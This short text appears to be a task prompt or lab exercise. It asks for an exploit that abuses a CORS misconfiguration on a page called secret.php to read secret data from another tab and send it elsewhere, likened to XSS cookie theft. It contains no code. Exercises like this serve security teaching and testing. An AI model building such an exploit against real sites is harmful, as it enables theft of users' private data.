prepare an exploit that takes advantage of a CORS configuration on
secret.php and, once opened in another tab, access and send the secret
information to another place in the same way an XSS can steal a cookie.
